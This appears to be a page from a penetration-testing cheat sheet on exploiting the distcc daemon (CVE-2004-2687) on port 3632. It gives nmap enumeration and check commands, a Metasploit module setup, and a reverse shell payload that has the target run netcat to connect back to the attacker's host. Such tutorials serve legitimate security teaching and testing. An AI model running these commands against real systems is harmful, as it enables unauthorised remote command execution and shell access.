Distcc - Port 3632

Become VeryLazyTech member! 🎁
Follow us on:
- ✖ Twitter @VeryLazyTech.
- 👾 Github @VeryLazyTech.
- 📜 Medium @VeryLazyTech.
- 📺 YouTube @VeryLazyTech.
- 📩 Telegram @VeryLazyTech.
- 🕵️‍♂️ My Site @VeryLazyTech.
Visit our shop for e-books and courses. 📚

Basic info

Distcc (Distributed Compiler) is a tool designed to speed up code compilation by distributing the workload to multiple machines over a network.

If a system is running the distccd daemon and is misconfigured (especially without authentication), it may allow an attacker to execute arbitrary commands remotely — a vulnerability famously tracked as CVE-2004-2687.

Key Details

Default Port: 3632/tcp
Service Name: distccd
Purpose: Distribute compilation tasks across multiple computers.
Risk: Remote Code Execution (RCE) if misconfigured.

Enumeration

1. Port Discovery

First, check if the service is open:

nmap -p 3632 <target>

PORT     STATE SERVICE
3632/tcp open  distccd

2. Service Fingerprinting

Confirm it’s actually Distcc:

nmap -sV -p 3632 <target>

3. Nmap CVE Check

Nmap has a script for CVE-2004-2687:

nmap -p 3632 <target> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"

If the host is vulnerable, you should see the output of the id command in the scan results.

Exploitation

1. Metasploit

Metasploit provides a dedicated module:

msfconsole
use exploit/unix/misc/distcc_exec
set RHOSTS <target>
set RPORT 3632
set CMD id
run

You can replace id with any command to execute remotely.

2. Manual Exploitation (Without Metasploit)

Distcc can execute shell commands by sending specially crafted requests. A quick PoC can be found here: 🔗 DarkCoderSc Gist

Example: Reverse Shell Payload

nmap -p 3632 <target> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='nc -e /bin/bash <your_ip> <your_port>'"

On your attacking machine:

nc -lvnp <your_port>

Learn & practice For the Bug Bounty

Support VeryLazyTech 🎉

Become VeryLazyTech member! 🎁
Follow us on:
- ✖ Twitter @VeryLazyTech.
- 👾 Github @VeryLazyTech.
- 📜 Medium @VeryLazyTech.
- 📺 YouTube @VeryLazyTech.
- 📩 Telegram @VeryLazyTech.
- 🕵️‍♂️ My Site @VeryLazyTech.
Visit our shop for e-books and courses. 📚

PreviousRDP - PORT 3389 NextSubversion (SVN) Server -Port 3690

Last updated 6 months ago

hashtagBasic info

hashtagKey Details

hashtagEnumeration

hashtag1. Port Discovery

hashtag2. Service Fingerprinting

hashtag3. Nmap CVE Check

hashtagExploitation

hashtag1. Metasploit

hashtag2. Manual Exploitation (Without Metasploit)

hashtagExample: Reverse Shell Payload